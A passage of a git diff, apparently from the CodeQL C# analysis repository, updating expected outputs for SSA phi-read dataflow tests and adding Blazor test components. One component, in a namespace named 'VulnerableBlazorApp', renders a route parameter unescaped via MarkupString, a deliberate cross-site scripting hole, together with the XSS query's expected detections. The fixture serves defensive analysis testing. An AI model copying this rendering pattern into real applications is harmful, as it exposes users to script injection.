[input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2908:24:2913 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2908:24:2913 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2912:24:2912 | access to local variable x | UseUseExplosion.cs:24:2908:24:2913 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2923:24:2928 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2923:24:2928 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2912:24:2912 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2923:24:2928 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2923:24:2928 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2923:24:2928 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2927:24:2927 | access to local variable x | UseUseExplosion.cs:24:2923:24:2928 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2938:24:2943 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2938:24:2943 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2927:24:2927 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2938:24:2943 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2938:24:2943 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2938:24:2943 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2942:24:2942 | access to local variable x | UseUseExplosion.cs:24:2938:24:2943 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2953:24:2958 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2953:24:2958 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2942:24:2942 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2953:24:2958 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2953:24:2958 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2953:24:2958 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2957:24:2957 | access to local variable x | UseUseExplosion.cs:24:2953:24:2958 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2968:24:2973 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2968:24:2973 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2957:24:2957 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2968:24:2973 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2968:24:2973 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2968:24:2973 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2972:24:2972 | access to local variable x | UseUseExplosion.cs:24:2968:24:2973 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2983:24:2988 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2983:24:2988 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2972:24:2972 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2983:24:2988 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2983:24:2988 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2983:24:2988 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2987:24:2987 | access to local variable x | UseUseExplosion.cs:24:2983:24:2988 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2998:24:3003 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2998:24:3003 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2987:24:2987 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2998:24:3003 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2998:24:3003 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2998:24:3003 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3002:24:3002 | access to local variable x | UseUseExplosion.cs:24:2998:24:3003 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3013:24:3018 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3013:24:3018 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3002:24:3002 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3013:24:3018 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3013:24:3018 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3013:24:3018 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3017:24:3017 | access to local variable x | UseUseExplosion.cs:24:3013:24:3018 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3028:24:3033 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3028:24:3033 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3017:24:3017 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3028:24:3033 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3028:24:3033 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3028:24:3033 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3032:24:3032 | access to local variable x | UseUseExplosion.cs:24:3028:24:3033 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3043:24:3048 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3043:24:3048 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3032:24:3032 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3043:24:3048 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3043:24:3048 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3043:24:3048 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3047:24:3047 | access to local variable x | UseUseExplosion.cs:24:3043:24:3048 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3058:24:3063 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3058:24:3063 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3047:24:3047 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3058:24:3063 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3058:24:3063 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3058:24:3063 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3062:24:3062 | access to local variable x | UseUseExplosion.cs:24:3058:24:3063 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3073:24:3078 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3073:24:3078 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3062:24:3062 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3073:24:3078 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3073:24:3078 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3073:24:3078 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3077:24:3077 | access to local variable x | UseUseExplosion.cs:24:3073:24:3078 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3088:24:3093 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3088:24:3093 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3077:24:3077 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3088:24:3093 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3088:24:3093 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3088:24:3093 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3092:24:3092 | access to local variable x | UseUseExplosion.cs:24:3088:24:3093 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3103:24:3108 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3103:24:3108 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3092:24:3092 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3103:24:3108 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3103:24:3108 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3103:24:3108 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3107:24:3107 | access to local variable x | UseUseExplosion.cs:24:3103:24:3108 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3118:24:3123 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3118:24:3123 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3107:24:3107 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3118:24:3123 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3118:24:3123 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3118:24:3123 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3122:24:3122 | access to local variable x | UseUseExplosion.cs:24:3118:24:3123 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3133:24:3138 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3133:24:3138 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3122:24:3122 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3133:24:3138 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3133:24:3138 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3133:24:3138 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3137:24:3137 | access to local variable x | UseUseExplosion.cs:24:3133:24:3138 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3148:24:3153 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3148:24:3153 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3137:24:3137 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3148:24:3153 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3148:24:3153 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3148:24:3153 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3152:24:3152 | access to local variable x | UseUseExplosion.cs:24:3148:24:3153 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3163:24:3168 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3163:24:3168 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3152:24:3152 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3163:24:3168 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3163:24:3168 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3163:24:3168 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3167:24:3167 | access to local variable x | UseUseExplosion.cs:24:3163:24:3168 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3178:24:3183 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3178:24:3183 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3167:24:3167 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3178:24:3183 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3178:24:3183 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3178:24:3183 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3182:24:3182 | access to local variable x | UseUseExplosion.cs:24:3178:24:3183 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:3193:24:3198 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:3193:24:3198 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3182:24:3182 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:3193:24:3198 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:3193:24:3198 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:3193:24:3198 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:3197:24:3197 | access to local variable x | UseUseExplosion.cs:24:3193:24:3198 | [input] SSA phi read(x) | -| UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | +| UseUseExplosion.cs:24:3197:24:3197 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | UseUseExplosion.cs:25:1712:25:1712 | access to local variable x | | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | UseUseExplosion.cs:25:1727:25:1727 | access to local variable x | | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | UseUseExplosion.cs:25:1742:25:1742 | access to local variable x | diff --git a/csharp/ql/test/library-tests/dataflow/ssa/SSAPhiRead.expected b/csharp/ql/test/library-tests/dataflow/ssa/SSAPhiRead.expected index 970e6fce5244..6fdda8812ab2 100644 --- a/csharp/ql/test/library-tests/dataflow/ssa/SSAPhiRead.expected +++ b/csharp/ql/test/library-tests/dataflow/ssa/SSAPhiRead.expected @@ -6,7 +6,7 @@ phiReadNode | Test.cs:25:16:25:16 | SSA phi read(x) | Test.cs:8:13:8:13 | x | | Test.cs:90:9:97:9 | SSA phi read(x) | Test.cs:78:13:78:13 | x | | Test.cs:99:9:99:15 | SSA phi read(x) | Test.cs:78:13:78:13 | x | -phiReadNodeRead +phiReadNodeFirstRead | DefUse.cs:80:30:80:31 | SSA phi read(this.Field2) | DefUse.cs:63:9:63:14 | this.Field2 | DefUse.cs:80:37:80:42 | access to field Field2 | | Fields.cs:63:16:63:28 | SSA phi read(this.LoopField) | Fields.cs:65:24:65:32 | this.LoopField | Fields.cs:65:24:65:32 | access to field LoopField | | Patterns.cs:20:9:38:9 | SSA phi read(o) | Patterns.cs:7:16:7:16 | o | Patterns.cs:20:17:20:17 | access to local variable o | @@ -15,16 +15,21 @@ phiReadNodeRead | Test.cs:90:9:97:9 | SSA phi read(x) | Test.cs:78:13:78:13 | x | Test.cs:92:17:92:17 | access to local variable x | | Test.cs:90:9:97:9 | SSA phi read(x) | Test.cs:78:13:78:13 | x | Test.cs:96:17:96:17 | access to local variable x | | Test.cs:99:9:99:15 | SSA phi read(x) | Test.cs:78:13:78:13 | x | Test.cs:99:13:99:13 | access to local variable x | -| Test.cs:99:9:99:15 | SSA phi read(x) | Test.cs:78:13:78:13 | x | Test.cs:104:17:104:17 | access to local variable x | phiReadInput -| DefUse.cs:80:30:80:31 | SSA phi read(this.Field2) | DefUse.cs:63:9:63:18 | SSA def(this.Field2) | -| DefUse.cs:80:30:80:31 | SSA phi read(this.Field2) | DefUse.cs:80:30:80:31 | SSA phi read(this.Field2) | +| DefUse.cs:80:30:80:31 | SSA phi read(this.Field2) | DefUse.cs:64:13:64:18 | SSA read(this.Field2) | +| DefUse.cs:80:30:80:31 | SSA phi read(this.Field2) | DefUse.cs:80:37:80:42 | SSA read(this.Field2) | | Fields.cs:63:16:63:28 | SSA phi read(this.LoopField) | Fields.cs:61:17:61:17 | SSA entry def(this.LoopField) | -| Fields.cs:63:16:63:28 | SSA phi read(this.LoopField) | Fields.cs:63:16:63:28 | SSA phi read(this.LoopField) | -| Patterns.cs:20:9:38:9 | SSA phi read(o) | Patterns.cs:7:16:7:23 | SSA def(o) | +| Fields.cs:63:16:63:28 | SSA phi read(this.LoopField) | Fields.cs:65:24:65:32 | SSA read(this.LoopField) | +| Patterns.cs:20:9:38:9 | SSA phi read(o) | Patterns.cs:8:13:8:13 | SSA read(o) | +| Patterns.cs:20:9:38:9 | SSA phi read(o) | Patterns.cs:12:18:12:18 | SSA read(o) | +| Patterns.cs:20:9:38:9 | SSA phi read(o) | Patterns.cs:16:18:16:18 | SSA read(o) | | Properties.cs:63:16:63:16 | SSA phi read(this.LoopProp) | Properties.cs:61:17:61:17 | SSA entry def(this.LoopProp) | -| Properties.cs:63:16:63:16 | SSA phi read(this.LoopProp) | Properties.cs:63:16:63:16 | SSA phi read(this.LoopProp) | +| Properties.cs:63:16:63:16 | SSA phi read(this.LoopProp) | Properties.cs:65:24:65:31 | SSA read(this.LoopProp) | | Test.cs:25:16:25:16 | SSA phi read(x) | Test.cs:24:9:24:15 | SSA phi(x) | -| Test.cs:25:16:25:16 | SSA phi read(x) | Test.cs:25:16:25:16 | SSA phi read(x) | +| Test.cs:25:16:25:16 | SSA phi read(x) | Test.cs:25:16:25:16 | SSA read(x) | | Test.cs:90:9:97:9 | SSA phi read(x) | Test.cs:78:13:78:17 | SSA def(x) | +| Test.cs:90:9:97:9 | SSA phi read(x) | Test.cs:82:17:82:17 | SSA read(x) | +| Test.cs:90:9:97:9 | SSA phi read(x) | Test.cs:86:17:86:17 | SSA read(x) | | Test.cs:99:9:99:15 | SSA phi read(x) | Test.cs:90:9:97:9 | SSA phi read(x) | +| Test.cs:99:9:99:15 | SSA phi read(x) | Test.cs:92:17:92:17 | SSA read(x) | +| Test.cs:99:9:99:15 | SSA phi read(x) | Test.cs:96:17:96:17 | SSA read(x) | diff --git a/csharp/ql/test/library-tests/dataflow/ssa/SSAPhiRead.ql b/csharp/ql/test/library-tests/dataflow/ssa/SSAPhiRead.ql index 8fee62217bf4..baa59bc5b677 100644 --- a/csharp/ql/test/library-tests/dataflow/ssa/SSAPhiRead.ql +++ b/csharp/ql/test/library-tests/dataflow/ssa/SSAPhiRead.ql @@ -1,17 +1,21 @@ import csharp import semmle.code.csharp.dataflow.internal.SsaImpl -import ExposedForTestingOnly +import Impl::TestAdjacentRefs as RefTest -query predicate phiReadNode(PhiReadNode phi, Ssa::SourceVariable v) { phi.getSourceVariable() = v } +query predicate phiReadNode(RefTest::Ref phi, Ssa::SourceVariable v) { + phi.isPhiRead() and phi.getSourceVariable() = v +} -query predicate phiReadNodeRead(PhiReadNode phi, Ssa::SourceVariable v, ControlFlow::Node read) { - phi.getSourceVariable() = v and - exists(ControlFlow::BasicBlock bb, int i | - ssaDefReachesReadExt(v, phi, bb, i) and +query predicate phiReadNodeFirstRead(RefTest::Ref phi, Ssa::SourceVariable v, ControlFlow::Node read) { + exists(RefTest::Ref r, ControlFlow::BasicBlock bb, int i | + phi.isPhiRead() and + RefTest::adjacentRefRead(phi, r) and + r.accessAt(bb, i, v) and read = bb.getNode(i) ) } -query predicate phiReadInput(PhiReadNode phi, DefinitionExt inp) { - phiHasInputFromBlockExt(phi, inp, _) +query predicate phiReadInput(RefTest::Ref phi, RefTest::Ref inp) { + phi.isPhiRead() and + RefTest::adjacentRefPhi(inp, phi) } diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Name.cs b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Name.cs new file mode 100644 index 000000000000..a9d098470e44 --- /dev/null +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Name.cs @@ -0,0 +1,22 @@ +namespace VulnerableBlazorApp.Components +{ + using Microsoft.AspNetCore.Components; + + public partial class Name : Microsoft.AspNetCore.Components.ComponentBase + { + protected override void BuildRenderTree(Microsoft.AspNetCore.Components.Rendering.RenderTreeBuilder builder) + { + if (TheName is not null) + { + builder.OpenElement(0, "div"); + builder.OpenElement(1, "p"); + builder.AddContent(2, (MarkupString)TheName); + builder.CloseElement(); + builder.CloseElement(); + } + } + + [Parameter] + public string TheName { get; set; } + } +} \ No newline at end of file diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList.cs b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList.cs new file mode 100644 index 000000000000..ceffb35303e5 --- /dev/null +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList.cs @@ -0,0 +1,50 @@ +namespace VulnerableBlazorApp.Components +{ + using System.Collections.Generic; + using Microsoft.AspNetCore.Components; + + [RouteAttribute("/names/{name?}")] + public partial class NameList : Microsoft.AspNetCore.Components.ComponentBase + { + protected override void BuildRenderTree(Microsoft.AspNetCore.Components.Rendering.RenderTreeBuilder builder) + { + if (Names is not null) + { + builder.OpenElement(0, "div"); + builder.OpenElement(1, "ul"); + foreach (var name in Names) + { + builder.OpenElement(2, "li"); + builder.OpenComponent(3); + builder.AddComponentParameter(4, nameof(VulnerableBlazorApp.Components.Name.TheName), name); + builder.CloseComponent(); + builder.CloseElement(); + } + builder.CloseElement(); + builder.CloseElement(); + } + + builder.OpenElement(5, "div"); + builder.OpenElement(6, "p"); + builder.AddContent(7, "Name: "); + builder.OpenComponent(8); + builder.AddComponentParameter(9, nameof(VulnerableBlazorApp.Components.Name.TheName), Name); + builder.CloseComponent(); + builder.CloseElement(); + } + + [Parameter] + public string Name { get; set; } + + protected override void OnParametersSet() + { + if (Name is not null) + { + Names.Add(Name); + } + } + + + public List Names { get; set; } = new List(); + } +} \ No newline at end of file diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.expected b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.expected new file mode 100644 index 000000000000..951269f2b580 --- /dev/null +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.expected @@ -0,0 +1,12 @@ +edges +| NameList.cs:31:99:31:102 | access to property Name : String | Name.cs:13:53:13:59 | access to property TheName | provenance | Sink:MaD:149 | +nodes +| Components_Pages_TestPage_razor.g.cs:138:15:138:22 | access to property UrlParam | semmle.label | access to property UrlParam | +| Components_Pages_TestPage_razor.g.cs:188:18:188:27 | access to property QueryParam | semmle.label | access to property QueryParam | +| Name.cs:13:53:13:59 | access to property TheName | semmle.label | access to property TheName | +| NameList.cs:31:99:31:102 | access to property Name : String | semmle.label | access to property Name : String | +subpaths +#select +| Components_Pages_TestPage_razor.g.cs:138:15:138:22 | access to property UrlParam | Components_Pages_TestPage_razor.g.cs:138:15:138:22 | access to property UrlParam | Components_Pages_TestPage_razor.g.cs:138:15:138:22 | access to property UrlParam | $@ flows to here and is written to HTML or JavaScript. | Components_Pages_TestPage_razor.g.cs:138:15:138:22 | access to property UrlParam | User-provided value | +| Components_Pages_TestPage_razor.g.cs:188:18:188:27 | access to property QueryParam | Components_Pages_TestPage_razor.g.cs:188:18:188:27 | access to property QueryParam | Components_Pages_TestPage_razor.g.cs:188:18:188:27 | access to property QueryParam | $@ flows to here and is written to HTML or JavaScript. | Components_Pages_TestPage_razor.g.cs:188:18:188:27 | access to property QueryParam | User-provided value | +| Name.cs:13:53:13:59 | access to property TheName | NameList.cs:31:99:31:102 | access to property Name : String | Name.cs:13:53:13:59 | access to property TheName | $@ flows to here and is written to HTML or JavaScript. | NameList.cs:31:99:31:102 | access to property Name : String | User-provided value | diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.qlref b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.qlref new file mode 100644 index 000000000000..faad1d6403c1 --- /dev/null +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.qlref @@ -0,0 +1 @@ +Security Features/CWE-079/XSS.ql \ No newline at end of file diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/remoteFlowSource.expected b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/remoteFlowSource.expected index 2c845e8e4001..2a9268cf01e3 100644 --- a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/remoteFlowSource.expected +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/remoteFlowSource.expected @@ -2,3 +2,6 @@ | Components_Pages_TestPage_razor.g.cs:138:15:138:22 | access to property UrlParam | ASP.NET Core component route parameter | | Components_Pages_TestPage_razor.g.cs:176:1:176:10 | access to property QueryParam | external | | Components_Pages_TestPage_razor.g.cs:188:18:188:27 | access to property QueryParam | external | +| NameList.cs:31:99:31:102 | access to property Name | ASP.NET Core component route parameter | +| NameList.cs:41:17:41:20 | access to property Name | ASP.NET Core component route parameter | +| NameList.cs:43:27:43:30 | access to property Name | ASP.NET Core component route parameter | diff --git a/csharp/ql/test/library-tests/standalone/brokentypes/BrokenTypes.cs b/csharp/ql/test/library-tests/standalone/brokentypes/BrokenTypes.cs new file mode 100644 index 